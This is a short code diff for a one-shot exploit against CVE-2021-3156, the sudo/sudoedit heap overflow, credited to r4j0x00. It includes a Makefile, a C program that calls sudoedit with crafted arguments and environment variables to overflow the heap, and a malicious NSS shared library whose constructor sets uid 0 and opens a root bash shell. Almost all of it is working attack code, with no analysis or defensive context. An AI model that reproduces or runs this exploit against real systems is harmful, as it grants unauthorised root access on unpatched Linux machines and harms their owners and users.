Exploit one shot for CVE-2021-3156

Author: r4j0x00

CVE-2021-3156_one_shot/Makefile

@@ -0,0 +1,4 @@
+all:
+	gcc exploit.c -o exploit
+	mkdir libnss_X
+	gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2

CVE-2021-3156_one_shot/exploit.c

@@ -0,0 +1,51 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/stat.h>
+#include <stdlib.h>
+
+char * str_repeat(char a, size_t n) {
+    char * s = malloc(n+1);
+    for(int i=0;i<n;++i)
+        s[i] = a;
+    s[n] = 0;
+    return s;
+}
+
+char * concat(const char * a, const char * b) {
+    size_t len_a = strlen(a);
+    size_t len_b = strlen(b);
+    size_t size = len_a + len_b;
+
+    char * s = malloc(size+1);
+    int i;
+
+    for(i=0;i<len_a;++i) s[i] = a[i];
+    for(i=0;i<len_b;++i) s[len_a+i] = b[i];
+    s[size] = 0;
+    return s;
+}
+
+int main() {
+    char *env[] = {
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "\\", "\\", "\\", "\\", "\\", "\\", "\\",
+        "X/X",
+        concat("LC_ALL=C.UTF-8@", str_repeat('A', 0xd0)),
+        NULL
+    };
+
+    char * a = concat(str_repeat('A', 0x70),"\\");
+    char * argv[] = {"/usr/bin/sudoedit", "-s", a, NULL};
+    execve(argv[0], argv, env);
+
+    puts("Execve failed");
+    exit(1);
+}

CVE-2021-3156_one_shot/sice.c

@@ -0,0 +1,11 @@
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+__attribute((constructor))
+static void sice() {
+    setuid(0);
+    system("id");
+    system("bash");
+    exit(0);
+}